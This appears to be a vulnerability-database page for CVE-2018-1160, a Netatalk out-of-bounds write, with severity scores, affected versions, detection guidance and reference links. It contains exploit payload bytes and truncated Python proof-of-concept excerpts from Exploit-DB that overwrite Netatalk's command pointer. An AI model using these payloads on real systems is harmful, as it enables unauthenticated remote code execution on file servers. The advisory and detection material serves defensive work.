CVE-2018-1160
published 2018-12-20CVE-2018-1160: Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote…
PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
86.54%
99.7th percentile
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | netatalk | < netatalk 2.2.6-2 (bullseye) | netatalk 2.2.6-2 (bullseye) |
| netatalk | netatalk | < 3.1.12 | 3.1.12 |
| netatalk | netatalk | — | — |
| netatalk | netatalk | >= 0 < 2.2.6-2 | 2.2.6-2 |
| netatalk | netatalk | >= 0 < 2.2.6-2 | 2.2.6-2 |
| netatalk | netatalk | >= 0 < 2.2.6-2 | 2.2.6-2 |
| synology | diskstation_manager | >= 5.2 < 5.2-5967-9 | 5.2-5967-9 |
| synology | diskstation_manager | >= 6.1 < 6.1.7-15284-3 | 6.1.7-15284-3 |
| synology | diskstation_manager | >= 6.2 < 6.2.1-23824-4 | 6.2.1-23824-4 |
| synology | router_manager | >= 1.2 < 1.2-7742-5 | 1.2-7742-5 |
Detection & IOCsextracted from sources · hover to see the quote
commandDSI OpenSession command byte: \x04 (open session command) with attnquant option \x01 and oversized length to trigger OOB write in dsi_opensess.c↗
bytes↗
DSI OpenSession exploit payload: \x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x01\x18\xad\xaa\xaa\xba\xef\xbe\xad\xde\xfe\xca\x1d\xc0\xce\xfa\xed\xfe
bytes↗
DSI OpenSession PoC payload: \x00\x00\x40\x00\x00\x00\x00\x00 + 0xdeadbeef + 0xfeedface + 0x63b660
- →The exploit targets TCP port 548 (AFP/DSI protocol). Monitor for unauthenticated DSI OpenSession packets (command byte 0x04) containing an attnquant option (0x01) with an oversized length field that exceeds bounds — this is the trigger for the OOB write in dsi_opensess.c. ↗
- →Detect exploitation attempts by looking for DSI OpenSession packets on port 548 where the attnquant option byte (0x01) is followed by a length byte of 0x18 (24 bytes) and the payload contains recognizable canary values such as \xad\xaa\xaa\xba, \xef\xbe\xad\xde, \xfe\xca\x1d\xc0, or \xce\xfa\xed\xfe used to overwrite internal Netatalk structures. ↗
- →After the exploit DSI OpenSession phase, watch for a follow-up AFP command packet (DSI command byte 0x02) with AFP function index byte 0x11 (25th entry in pre_auth table), which is used to invoke arbitrary code via the overwritten commands pointer — this two-stage pattern (OpenSession exploit + AFP 0x11 dispatch) is characteristic of CVE-2018-1160 exploitation. ↗
- →The vulnerability is in dsi_opensess.c; any crash or unexpected termination of the Netatalk afpd process following a DSI OpenSession request from an unauthenticated source should be treated as a potential exploitation attempt. ↗
- ·The hardcoded memory addresses in the exploit (preauth_switch_base, afp_getsrvrparms, etc.) are specific to a Netatalk build compiled for x86_64 Seagate NAS OS. Exploiting other targets requires re-deriving these addresses, meaning byte-signature detection based on these specific addresses will only match the Seagate-targeted variant. ↗
- ·The vulnerability affects Netatalk versions before 3.1.12. Debian resolved it in package version 2.2.6-2 across bullseye, forky, sid, and trixie. Detection and patching scope should account for both upstream and downstream package versioning differences. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv9.8CRITICAL
vendor_debian9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j675-7hvj-qfw5: Netatalk before 3
ghsa_unreviewed·2022-05-13
CVE-2018-1160 [CRITICAL] CWE-787 GHSA-j675-7hvj-qfw5: Netatalk before 3
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
OSV
CVE-2018-1160: Netatalk before 3
osv·2018-12-20·CVSS 9.8
CVE-2018-1160 [CRITICAL] CVE-2018-1160: Netatalk before 3
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
Debian
CVE-2018-1160: netatalk - Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c...
vendor_debian·2018·CVSS 9.8
CVE-2018-1160 [CRITICAL] CVE-2018-1160: netatalk - Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c...
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
Scope: local
bullseye: resolved (fixed in 2.2.6-2)
forky: resolved (fixed in 2.2.6-2)
sid: resolved (fixed in 2.2.6-2)
trixie: resolved (fixed in 2.2.6-2)
No detection rules found.
Exploit-DB
QNAP Netatalk < 3.1.12 - Authentication Bypass
exploitdb·2019-04-08·CVSS 9.8
CVE-2018-1160 [CRITICAL] QNAP Netatalk < 3.1.12 - Authentication Bypass
QNAP Netatalk cmd =====
data += '\x11' # use the 25th entry in the pre_auth table. We'll write the function to execute there
data += '\x00' # pad
if (param_string == False):
data += ("\x00" * 134)
else:
data += param_string
data += ("\x00" * (134 - len(param_string)))
data += address # we'll jump to this address
sock.sendall(data)
return
##
# Parses the DSI header. If we don't get the expected request id
# then we bail out.
##
def parse_dsi(payload, expected_req_id):
(flags, command, req_id, error_code, length, reserved) = struct.unpack_from('>BBHIII', payload)
if command != 8:
if flags != 1 or command != 2 or req_id != expected_req_id:
print '[-] Bad DSI Header: %u %u %u' % (flags, command, req_id)
sys.exit(0)
if error_code != 0 and error_code != 4294962287:
print '[-] The server resp
Exploit-DB
Netatalk 3.1.12 - Authentication Bypass (PoC)
exploitdb·2018-12-21
CVE-2018-1160 Netatalk 3.1.12 - Authentication Bypass (PoC)
Netatalk 3.1.12 - Authentication Bypass (PoC)
---
import socket
import struct
import sys
if len(sys.argv) != 3:
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
sock.connect((ip, port))
dsi_payload = "\x00\x00\x40\x00" # client quantum
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
dsi_opensession = "\x01" # attention quantum option
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
dsi_opensession += dsi_payload
dsi_header = "\x00" # "request" flag
ds
Exploit-DB
Netatalk 3.1.12 - Authentication Bypass
exploitdb·2018-12-21·CVSS 9.8
CVE-2018-1160 [CRITICAL] Netatalk 3.1.12 - Authentication Bypass
Netatalk 3.1.12 - Authentication Bypass
---
##
# Exploit Title: Netatalk Authentication Bypass
# Date: 12/20/2018
# Exploit Author: Jacob Baines
# Vendor Homepage: http://netatalk.sourceforge.net/
# Software Link: https://sourceforge.net/projects/netatalk/files/
# Version: Before 3.1.12
# Tested on: Seagate NAS OS (x86_64)
# CVE : CVE-2018-1160
# Advisory: https://www.tenable.com/security/research/tra-2018-48
##
import argparse
import socket
import struct
import sys
# Known addresses:
# This exploit was written against a Netatalk compiled for an
# x86_64 Seagate NAS. The addresses below will need to be changed
# for a different target.
preauth_switch_base = '\x60\xb6\x63\x00\x00\x00\x00\x00' # 0x63b6a0
afp_getsrvrparms = '\x60\xb6\x42\x00\x00\x00\x00\x00' # 0x42b660
afp_openvol = '\xb0\
http://netatalk.sourceforge.net/3.1/ReleaseNotes3.1.12.htmlhttp://packetstormsecurity.com/files/152440/QNAP-Netatalk-Authentication-Bypass.htmlhttp://www.securityfocus.com/bid/106301https://attachments.samba.org/attachment.cgi?id=14735https://github.com/tenable/poc/tree/master/netatalk/cve_2018_1160/https://www.debian.org/security/2018/dsa-4356https://www.exploit-db.com/exploits/46034/https://www.exploit-db.com/exploits/46048/https://www.exploit-db.com/exploits/46675/https://www.synology.com/security/advisory/Synology_SA_18_62https://www.tenable.com/security/research/tra-2018-48http://netatalk.sourceforge.net/3.1/ReleaseNotes3.1.12.htmlhttp://packetstormsecurity.com/files/152440/QNAP-Netatalk-Authentication-Bypass.htmlhttp://www.securityfocus.com/bid/106301https://attachments.samba.org/attachment.cgi?id=14735https://github.com/tenable/poc/tree/master/netatalk/cve_2018_1160/https://www.debian.org/security/2018/dsa-4356https://www.exploit-db.com/exploits/46034/https://www.exploit-db.com/exploits/46048/https://www.exploit-db.com/exploits/46675/https://www.synology.com/security/advisory/Synology_SA_18_62https://www.tenable.com/security/research/tra-2018-48
2018-12-20
Published